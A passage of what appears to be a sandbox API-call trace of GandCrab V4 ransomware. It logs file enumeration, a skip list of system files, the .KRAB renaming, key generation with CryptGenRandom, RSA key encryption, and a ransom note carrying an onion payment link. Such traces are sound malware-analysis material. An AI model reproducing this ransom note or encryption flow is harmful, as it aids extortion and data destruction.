nmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.356] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.359] CloseHandle (hObject=0x2f4) returned 1 [0041.360] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.360] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.360] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x22f)) [0041.360] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.361] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.361] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.361] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 85 [0041.361] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2f4 [0041.361] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.362] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.362] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 62 [0041.362] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0041.362] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xf8a208 [0041.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.362] FindNextFileW (in: hFindFile=0xf8a208, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.362] FindNextFileW (in: hFindFile=0xf8a208, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.362] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.362] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.362] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" [0041.362] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.362] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0041.362] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 85 [0041.363] lstrlenW (lpString=".lock") returned 5 [0041.363] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.363] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.363] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.363] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.363] FindNextFileW (in: hFindFile=0xf8a208, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.363] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.363] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.363] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="desktop.ini" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini" [0041.363] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.364] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini.KRAB") returned 78 [0041.364] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0041.364] lstrlenW (lpString=".ini") returned 4 [0041.364] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.364] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".ini ") returned 5 [0041.364] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.364] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0041.364] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0041.364] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0041.364] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.364] FindNextFileW (in: hFindFile=0xf8a208, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.364] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.364] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.364] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt" [0041.365] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.365] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt.KRAB") returned 83 [0041.365] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 78 [0041.365] lstrlenW (lpString=".txt") returned 4 [0041.365] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.365] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.365] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.365] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 78 [0041.365] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 78 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.366] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.366] FindNextFileW (in: hFindFile=0xf8a208, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0041.366] FindClose (in: hFindFile=0xf8a208 | out: hFindFile=0xf8a208) returned 1 [0041.366] CloseHandle (hObject=0x2f4) returned 1 [0041.366] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0041.366] FindClose (in: hFindFile=0xf8a088 | out: hFindFile=0xf8a088) returned 1 [0041.366] CloseHandle (hObject=0x2d8) returned 1 [0041.366] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.366] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0041.367] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0041.367] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0041.367] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0041.367] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.367] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.367] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.367] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0041.367] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0041.367] lstrcatW (in: lpString1="C:\\", lpString2="bootmgr" | out: lpString1="C:\\bootmgr") returned="C:\\bootmgr" [0041.367] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.367] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\bootmgr.KRAB") returned 15 [0041.367] lstrlenW (lpString="C:\\bootmgr") returned 10 [0041.367] lstrlenW (lpString="C:\\bootmgr") returned 10 [0041.368] lstrlenW (lpString="C:\\bootmgr") returned 10 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="desktop.ini") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="autorun.inf") returned 1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="iconcache.db") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="bootsect.bak") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="boot.ini") returned 1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat.log") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="thumbs.db") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="KRAB-DECRYPT.html") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="KRAB-DECRYPT.txt") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="CRAB-DECRYPT.txt") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="ntldr") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="NTDETECT.COM") returned -1 [0041.368] lstrcmpiW (lpString1="bootmgr", lpString2="Bootfont.bin") returned 1 [0041.368] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.368] CryptAcquireContextW (in: phProv=0x338f8b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f8b4*=0xf96440) returned 1 [0041.369] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0041.369] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0041.369] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0041.369] CryptGenRandom (in: hProv=0xf96440, dwLen=0x20, pbBuffer=0x338f94c | out: pbBuffer=0x338f94c) returned 1 [0041.369] CryptReleaseContext (hProv=0xf96440, dwFlags=0x0) returned 1 [0041.369] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.369] CryptAcquireContextW (in: phProv=0x338f8b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f8b4*=0xf966e8) returned 1 [0041.370] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0041.370] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0041.370] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0041.370] CryptGenRandom (in: hProv=0xf966e8, dwLen=0x8, pbBuffer=0x338f96c | out: pbBuffer=0x338f96c) returned 1 [0041.370] CryptReleaseContext (hProv=0xf966e8, dwFlags=0x0) returned 1 [0041.370] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.371] CryptAcquireContextW (in: phProv=0x338f8ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f8ac*=0xf966e8) returned 1 [0041.371] CryptImportKey (in: hProv=0xf966e8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f8b0 | out: phKey=0x338f8b0*=0xf8a2c8) returned 1 [0041.371] CryptGetKeyParam (in: hKey=0xf8a2c8, dwParam=0x8, pbData=0x338f8a4, pdwDataLen=0x338f8a8, dwFlags=0x0 | out: pbData=0x338f8a4*=0x800, pdwDataLen=0x338f8a8*=0x4) returned 1 [0041.371] CryptEncrypt (in: hKey=0xf8a2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338f8dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338f8dc*=0x100) returned 1 [0041.372] GetLastError () returned 0x0 [0041.372] CryptDestroyKey (hKey=0xf8a2c8) returned 1 [0041.372] CryptReleaseContext (hProv=0xf966e8, dwFlags=0x0) returned 1 [0041.372] CryptAcquireContextW (in: phProv=0x338f8ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f8ac*=0xf96880) returned 1 [0041.372] CryptImportKey (in: hProv=0xf96880, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f8b0 | out: phKey=0x338f8b0*=0xf8a3c8) returned 1 [0041.372] CryptGetKeyParam (in: hKey=0xf8a3c8, dwParam=0x8, pbData=0x338f8a4, pdwDataLen=0x338f8a8, dwFlags=0x0 | out: pbData=0x338f8a4*=0x800, pdwDataLen=0x338f8a8*=0x4) returned 1 [0041.372] CryptEncrypt (in: hKey=0xf8a3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338f8dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338f8dc*=0x100) returned 1 [0041.372] GetLastError () returned 0x0 [0041.372] CryptDestroyKey (hKey=0xf8a3c8) returned 1 [0041.372] CryptReleaseContext (hProv=0xf96880, dwFlags=0x0) returned 1 [0041.373] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.411] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.411] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.411] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.411] lstrcmpW (lpString1="BOOTNXT", lpString2=".") returned 1 [0041.411] lstrcmpW (lpString1="BOOTNXT", lpString2="..") returned 1 [0041.411] lstrcatW (in: lpString1="C:\\", lpString2="BOOTNXT" | out: lpString1="C:\\BOOTNXT") returned="C:\\BOOTNXT" [0041.411] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.411] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\BOOTNXT.KRAB") returned 15 [0041.412] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0041.412] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0041.412] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="desktop.ini") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="autorun.inf") returned 1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntuser.dat") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="iconcache.db") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="bootsect.bak") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="boot.ini") returned 1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntuser.dat.log") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="thumbs.db") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="KRAB-DECRYPT.html") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="KRAB-DECRYPT.txt") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="CRAB-DECRYPT.txt") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntldr") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="NTDETECT.COM") returned -1 [0041.412] lstrcmpiW (lpString1="BOOTNXT", lpString2="Bootfont.bin") returned 1 [0041.412] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.412] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.412] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0041.412] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0041.412] lstrcatW (in: lpString1="C:\\", lpString2="BOOTSECT.BAK" | out: lpString1="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK" [0041.412] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.412] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\BOOTSECT.BAK.KRAB") returned 20 [0041.413] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0041.413] lstrlenW (lpString=".BAK") returned 4 [0041.413] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.413] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".BAK ") returned 5 [0041.413] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.413] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0041.413] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0041.413] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="desktop.ini") returned -1 [0041.413] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="autorun.inf") returned 1 [0041.413] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0041.413] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="iconcache.db") returned -1 [0041.413] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootsect.bak") returned 0 [0041.413] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.413] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.413] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.414] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.414] lstrcatW (in: lpString1="C:\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\d2ca4a08d2ca4dee3d.lock") returned="C:\\d2ca4a08d2ca4dee3d.lock" [0041.414] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.414] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 31 [0041.414] lstrlenW (lpString="C:\\d2ca4a08d2ca4dee3d.lock") returned 26 [0041.414] lstrlenW (lpString=".lock") returned 5 [0041.414] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.414] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.414] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.415] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.415] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.415] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0041.415] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0041.415] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0041.415] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0041.415] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.415] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.415] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.415] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.415] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.415] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.416] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.416] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Documents and Settings\\\\KRAB-DECRYPT.txt") returned 43 [0041.416] CreateFileW (lpFileName="C:\\Documents and Settings\\\\KRAB-DECRYPT.txt" (normalized: "c:\\documents and settings\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0041.417] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY 